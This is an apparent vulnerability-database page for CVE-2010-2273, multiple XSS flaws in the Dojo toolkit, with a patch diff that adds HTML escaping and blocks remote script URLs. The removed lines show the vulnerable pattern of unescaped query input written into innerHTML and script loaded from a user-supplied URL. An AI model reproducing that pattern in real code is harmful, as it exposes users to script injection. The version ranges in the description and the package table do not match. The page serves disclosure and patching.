Moderate severityNVD Advisory· Published Jun 15, 2010· Updated Apr 29, 2026

CVE-2010-2273

Description

Multiple cross-site scripting (XSS) vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, and util/buildscripts/jslib/buildUtil.js, as demonstrated by the (1) dojoUrl and (2) testUrl parameters to util/doh/runner.html.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
dojonpm	>= 1.13.0, < 1.13.1	1.13.1
dojonpm	>= 1.12.0, < 1.12.4	1.12.4
dojonpm	>= 1.11.0, < 1.11.6	1.11.6
dojonpm	>= 1.10.0, < 1.10.10	1.10.10

Affected products

Dojotoolkit/Dojo14 versions
cpe:2.3:a:dojotoolkit:dojo:1.0:*:*:*:*:*:*:*+ 13 more
- cpe:2.3:a:dojotoolkit:dojo:1.0:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.4:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.4.1:*:*:*:*:*:*:*

Patches

9117ffd5a386

Fix potential XSS vulnerability (#307)

https://github.com/dojo/dojoBryan ForbesAug 10, 2018via ghsa

commit

3 files changed · +25 −39

testsDOH/_base/i18nExhaustive.js+1 −33 modified

@@ -15,10 +15,6 @@ define([
 		"sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 				
 		"sync,ab,src,./dojo,src,./i18n-test,legacy",
 		"sync,ab,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy",
@@ -31,10 +27,6 @@ define([
 		"sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 		
 		"sync,ab-cd,src,./dojo,src,./i18n-test,legacy",
 		"sync,ab-cd,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy",
@@ -47,10 +39,6 @@ define([
 		"sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 
 		"sync,ab-cd-ef,src,./dojo,src,./i18n-test,legacy",
 		"sync,ab-cd-ef,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy",
@@ -63,10 +51,6 @@ define([
 		"sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 		"async,,src,./dojo,src,./i18n-test,amd",
 		"async,,src,./dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"async,,src,./dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
@@ -75,10 +59,6 @@ define([
 		"async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 		
 		"async,ab,src,./dojo,src,./i18n-test,amd",
 		"async,ab,src,./dojo,built,./built-i18n-test/built/i18nTest,amd",
@@ -88,10 +68,6 @@ define([
 		"async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 
 		"async,ab-cd,src,./dojo,src,./i18n-test,amd",
 		"async,ab-cd,src,./dojo,built,./built-i18n-test/built/i18nTest,amd",
@@ -101,10 +77,6 @@ define([
 		"async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
 		"async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
 		
 		"async,ab-cd-ef,src,./dojo,src,./i18n-test,amd",
 		"async,ab-cd-ef,src,./dojo,built,./built-i18n-test/built/i18nTest,amd",
@@ -113,11 +85,7 @@ define([
 		"async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,src,./i18n-test,amd",
 		"async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd",
 		"async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd",
-		"async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd",
-		"async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd",
-		"async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd",
-		"async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd"];
+		"async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd"];
 
 	for(var i = 0; i<testParams.length; i++){
 		doh.register("testsDOH._base.i18nExhaustive" + i, require.toUrl("dojo/main") + "/../../i18n-test/unit.html?" + testParams[i]);

testsDOH/_base/loader/i18n-exhaustive/i18n-test/unit.html+23 −5 modified

@@ -1,4 +1,4 @@
-<html>
+<!--<html>
 <head>
 	<style type="text/css">
 		span.pass {background-color:green}
@@ -12,6 +12,19 @@
 		//#1,,src,./dojo",src,./dtk-i18n-test
 
 		(function(){
+		var escapes = {
+			"&": "&amp;",
+			"<": "&lt;",
+			">": "&gt;",
+			"\"": "&quot;",
+			"'": "&#039;"
+		};
+		function escape(unsafe) {
+			return unsafe.replace(/[&<>"']/g, function (match) {
+				return escapes[match];
+			});
+		}
+
 		var hashInfo = location.search.substring(1),
 			options = hashInfo.split(",");
 			async = options[0]=="async" ? true : undefined,
@@ -23,7 +36,11 @@
 			testId = "async: " + async + ", locale: " + locale + ", dojo: " + dojoType + ", i18nTest: " + i18nTestType + "(" + hashInfo + ")",
 			testKind = options[6];
 
-		document.getElementById("status").innerHTML += hashInfo;
+		if ((/^http/i).test(i18nTestLocation)) {
+			return;
+		}
+
+		document.getElementById("status").innerHTML += escape(hashInfo);
 
 		function report(result){
 			require(["doh"], function(doh){
@@ -39,7 +56,7 @@
 			}else{
 				text = "<span class='fail'>FAIL</span>: " + testId + "<br>" + result;
 			}
-			document.getElementById("status").innerHTML = text;
+			document.getElementById("status").innerHTML = escape(text);
 		}	
 
 		dojoConfig = {
@@ -85,10 +102,11 @@
 		var node = document.createElement("script");
 		node.type = "text/javascript";
 		node.charset = "utf-8";
-		node.src = (/^http/.test(dojoLocation) ? dojoLocation :  "../" + dojoLocation) + "/dojo.js";
+		// If a user passes a remote URL, force it to use the local dojo
+		node.src = ((/^http/i).test(dojoLocation) ? '../dojo' :  "../" + dojoLocation) + "/dojo.js";
 console.log(node.src);
 		document.getElementsByTagName("head")[0].appendChild(node);
 		})();
 	</script>
 </body>
-</html>
+</html>-->

testsDOH/_base/loader/i18n-exhaustive/test-instructions.md+1 −1 modified

@@ -59,6 +59,6 @@ The various built module and loaders are constructed by the v1.7 builder. The sh
 i18n-test/build-test-targets.sh accomplishes this task automatically.
 
 A unit test html page is constructed at i18n-test/unit.html. Given a query string, it will load a particular loader and
-exercise a particular set of modules.
+exercise a particular set of modules. Its contents must be uncommented before running the tests.
 
 Finally, the DOH test dojo/testsDOH/_base/i18nExhaustive runs all the various combinations.

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/nvdPatchVendor Advisory
bugs.dojotoolkit.org/ticket/10773nvdExploitWEB
www.gdssecurity.com/l/b/2010/03/12/multiple-dom-based-xss-in-dojo-toolkit-sdk/nvdExploit
secunia.com/advisories/38964nvdVendor AdvisoryWEB
secunia.com/advisories/40007nvdVendor AdvisoryWEB
www.vupen.com/english/advisories/2010/1281nvdVendor AdvisoryWEB
github.com/advisories/GHSA-536q-8gxx-m782ghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2010-2273ghsaADVISORY
dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisoryghsaWEB
www-01.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www-1.ibm.com/support/docview.wssnvdWEB
www.gdssecurity.com/l/b/2010/03/12/multiple-dom-based-xss-in-dojo-toolkit-sdkghsaWEB
bugs.dojotoolkit.org/ticket/10773ghsaWEB
github.com/dojo/dojo/commit/9117ffd5a3863e44c92fcd58564c0da22be858f4ghsaWEB
github.com/dojo/dojo/pull/307ghsaWEB
www.npmjs.com/advisories/972ghsaWEB

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.035
exploit	0.030
kev	0.000
patch	-0.070
ransomware	0.000